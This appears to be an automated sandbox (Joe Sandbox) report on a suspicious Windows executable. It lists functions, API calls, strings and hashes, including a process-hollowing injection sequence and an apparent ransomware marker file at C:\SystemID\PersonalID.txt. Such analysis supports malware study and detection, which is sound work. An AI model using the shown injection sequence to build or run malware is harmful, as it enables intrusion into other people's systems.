Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9

Function 0041B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA

Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277

Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73

Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD

GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
TranslateMessage.USER32(?), ref: 0041B4CD
DispatchMessageW.USER32(?), ref: 0041B4D7

Strings

I:\5d2860c89d774.jpg, xrefs: 0041B32F
%username%, xrefs: 0041B283

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
String ID: %username%$I:\5d2860c89d774.jpg
API String ID: 441990211-897913220
Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96

Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

unknown, xrefs: 0045175D
.\crypto\err\err.c, xrefs: 004516A5, 004516C4, 004516DB, 004516EE, 0045170D, 00451777

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .\crypto\err\err.c$unknown
API String ID: 0-565200744
Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E

Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042419D
IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252

Strings

i;B, xrefs: 00424168

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: DebuggerPresent_memset
String ID: i;B
API String ID: 2328436684-472376889
Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59

Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
___raise_securityfailure.LIBCMT ref: 0042AC7A

Strings

8Q, xrefs: 0042AC75

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8Q
API String ID: 3761405300-2096853525
Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45

Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

_memset.LIBCMT ref: 00413C83

Strings

vector<T> too long, xrefs: 00413C96

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
String ID: vector<T> too long
API String ID: 1327501947-3788999226
Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9

Function 0040C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
_fputws.LIBCMT ref: 0040C9C6
_fputws.LIBCMT ref: 0040C9E8
_fputws.LIBCMT ref: 0040C9F3

Strings

C:\SystemID\PersonalID.txt, xrefs: 0040C956
C:\SystemID, xrefs: 0040C946

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _fputws$CreateDirectory
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2590308727-54166481
Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA

Function 00420DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00420DD5
__calloc_crt.LIBCMT ref: 00420DEE

Strings

Assertion failed: %s, file %s, line %d, xrefs: 00420E13

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: __calloc_crt
String ID: Assertion failed: %s, file %s, line %d
API String ID: 3494438863-969893948
Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699

Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00480686

Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18

Strings

ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
.\crypto\evp\digest.c, xrefs: 00480638

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memset_raise
String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
API String ID: 1484197835-3867593797
Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99

Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0044F251

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F266

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

TeM, xrefs: 0044F247, 0044F25B

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: TeM
API String ID: 757275642-2215902641
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

Analysis Process: file.exePID: 7164, Parent PID: 6956COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	29.5%
Signature Coverage:	0%
Total number of Nodes:	129
Total number of Limit Nodes:	20

Executed Functions

Function 004A7829 Relevance: 70.2, APIs: 35, Strings: 5, Instructions: 231
timelibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 004A78A7
DeleteVolumeMountPointW.KERNEL32(00000000), ref: 004A78AE
GetCommandLineA.KERNEL32 ref: 004A78B4
lstrcatW.KERNEL32(?,00000000), ref: 004A78D9
InterlockedExchange.KERNEL32(?,00000000), ref: 004A78E5
SetActiveWindow.USER32(00000000), ref: 004A78EC
TryEnterCriticalSection.KERNEL32(?), ref: 004A78F7
WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004A790D
CopyRect.USER32(?,?), ref: 004A791D
DebugActiveProcessStop.KERNEL32(00000000), ref: 004A7924
GetAtomNameW.KERNEL32(00000000,00000000,00000000), ref: 004A792D
GlobalDeleteAtom.KERNEL32(00000000), ref: 004A7934
GetTimeZoneInformation.KERNEL32(?), ref: 004A7942
GetComputerNameW.KERNEL32(00000000,00000000), ref: 004A794A
_memset.LIBCMT ref: 004A795C
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 004A796B
DebugBreak.KERNEL32 ref: 004A7971
EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 004A797A
LoadLibraryA.KERNEL32(00000000), ref: 004A7990
LoadLibraryA.KERNEL32(emuritowuwep), ref: 004A7997
SetCommMask.KERNELBASE(00000000,00000000), ref: 004A79AB
GetTickCount.KERNEL32 ref: 004A79B1
GetSystemTimes.KERNEL32(?,?,?), ref: 004A79C6
FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004A79EC
OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 004A7A0A
CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 004A7A13
FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004A7A27
__vswprintf.LIBCMT ref: 004A7A3E
_calloc.LIBCMT ref: 004A7A4B
_printf.LIBCMT ref: 004A7A57
_calloc.LIBCMT ref: 004A7A63
_fgetpos.LIBCMT ref: 004A7A6A
_calloc.LIBCMT ref: 004A7A71
LocalAlloc.KERNELBASE(00000000,?,?,?), ref: 004A7A80
LoadLibraryA.KERNELBASE(msimg32.dll), ref: 004A7AC3

Strings

msimg32.dll, xrefs: 004A7ABE
}$, xrefs: 004A7AE7
emuritowuwep, xrefs: 004A7992
0 %f, xrefs: 004A7A33
%s %c, xrefs: 004A7A51

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: LibraryLoad_calloc$ActiveAtomCommDebugDeleteNameTimerWaitable$AllocBreakCommandComputerConfigConsoleCopyCountCreateCriticalDateDefaultDriveEnterEnumExchangeFoldFormatFormatsGlobalInformationInterlockedLineLocalLogicalMaskMessageMountOpenPointProcessRectSectionStopStringStringsSystemTickTimeTimesVolumeWindowWriteZone__vswprintf_fgetpos_memset_printflstrcat
String ID: %s %c$0 %f$emuritowuwep$msimg32.dll$}$
API String ID: 4223693206-3011243727
Opcode ID: 564bcb48db2b36318d894bddd3ea90382717a3601369224ba8dd1487708703bf
Instruction ID: b8dea9801482fd01cfd1067a498fa11e353114709f9052ddaeecfa012f4ff342
Opcode Fuzzy Hash: 564bcb48db2b36318d894bddd3ea90382717a3601369224ba8dd1487708703bf
Instruction Fuzzy Hash: 5B71AF7140A620ABC331AB61EC499AF3F6CEF6B355B01053FF249D2161DB784546CBAE

Function 022F0110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 022F0156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 022F016C
CreateProcessA.KERNELBASE(?,00000000), ref: 022F0255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 022F0270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 022F0283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 022F029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022F02C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 022F02E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 022F0304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 022F032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 022F0399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022F03BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 022F03E1
ResumeThread.KERNELBASE(00000000), ref: 022F03ED
ExitProcess.KERNEL32(00000000), ref: 022F0412

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 93872480-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: bc7b60e7097138c40971185e3ea368d9b5e7eff50ea85e87f1b9f86fa71d1eb9
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: F8B1D874A00209AFDB44CF98C895F9EBBB5FF88314F248158E608AB395D771AE41CF94

Function 00401327 Relevance: 21.1, APIs: 14, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fast_error_exit.LIBCMT ref: 00401372
__mtinit.LIBCMT ref: 00401378
_fast_error_exit.LIBCMT ref: 00401383
__RTC_Initialize.LIBCMT ref: 00401389
__ioinit.LIBCMT ref: 00401391
__amsg_exit.LIBCMT ref: 0040139C
GetCommandLineW.KERNEL32 ref: 004013A2
__wsetargv.LIBCMT ref: 004013B6
__amsg_exit.LIBCMT ref: 004013C1
__wsetenvp.LIBCMT ref: 004013C7
__amsg_exit.LIBCMT ref: 004013D2
__cinit.LIBCMT ref: 004013D9
__amsg_exit.LIBCMT ref: 004013E4
__wwincmdln.LIBCMT ref: 004013EA

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
String ID:
API String ID: 2477803136-0
Opcode ID: 70f8b1119466b1b414ff4d00518d2b9ecb3f839af7780154a84f5fabeea9db00
Instruction ID: 8c17f6059ffbf052f1353c0810e5ff4f3cc530814015d503f08207b996c2b9f8
Opcode Fuzzy Hash: 70f8b1119466b1b414ff4d00518d2b9ecb3f839af7780154a84f5fabeea9db00
Instruction Fuzzy Hash: 0E21C7B0D0034499EB547BB2A946B6E36A8AF8070DF10447FFA05BA5E3EE7C8941875D

Function 022F0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 022F0533

Strings

d, xrefs: 022F0584
0, xrefs: 022F0492
mfoaskdfnoa, xrefs: 022F0520, 022F0523
saodkfnosa9uin, xrefs: 022F04DA

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 16dcf1e85ae7b765c4f5ceb98a7433d3061785618e0ca39bdddb2497d9e18af6
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 46511870D08388DAEB11CBE8C849BDDBFB6AF11708F144058D5447F28AC7FA5659CB66

Function 022F05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 022F05EC

Strings

o, xrefs: 022F0600
apfHQ, xrefs: 022F05E2, 022F05E5

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: ff7f1b7bf9695e6786e73eb838b6faf796049089e2a73467555257c3b0283d5a
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 3A011E70C0425DEADB50DBD8C5183AEFFB5AF41308F1480A9C5092B246D7B69B59CBA1

Function 021777C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021777EE
Module32First.KERNEL32(00000000,00000224), ref: 0217780E

Memory Dump Source

Source File: 00000003.00000002.1882592220.0000000002177000.00000040.00000020.00020000.00000000.sdmp, Offset: 02177000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2177000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 470488061e73a80746480df9facf1d568b58f3a29830f2b43f25abe58bd2e4ac
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 53F062316407146FD7213BB5A88DB7AB6F8AF89729F100538E642910C0DBB0E8468A61

Function 00402596 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004025AB

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: d83af5e678f1ea4089bce034330ace12768e6a6437f60fb0112246dd9487f9d1
Instruction ID: d84b4d71a2ca30b2ffd99d73106059b061eb6fdd5c23bf365b4e943021bf88de
Opcode Fuzzy Hash: d83af5e678f1ea4089bce034330ace12768e6a6437f60fb0112246dd9487f9d1
Instruction Fuzzy Hash: 31D05E36554309AEDB009F706C48B633BDCD385395F10443AB81CC6290F6B4C590C64C

Function 004A751D Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00000040,?), ref: 004A7533

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3f34c01d2550e61fb44d90c430b5dfd17a12ef3a284c08f0ace1d646603aa66c
Instruction ID: b6759d83223ea4bba9f524671adf8fe5286732ec4916b71ffc985fda3f1950d1
Opcode Fuzzy Hash: 3f34c01d2550e61fb44d90c430b5dfd17a12ef3a284c08f0ace1d646603aa66c
Instruction Fuzzy Hash: EAC08C71200208BFDB01ABA1FD01E5A3B6DE700244F000130B70AA00B0C2B2E910AB5D

Function 02177485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 021774D6

Memory Dump Source

Source File: 00000003.00000002.1882592220.0000000002177000.00000040.00000020.00020000.00000000.sdmp, Offset: 02177000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2177000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 067a8338d047d406a5ca8572678e3e4c2808f895876b52015b9e8fd06f287313
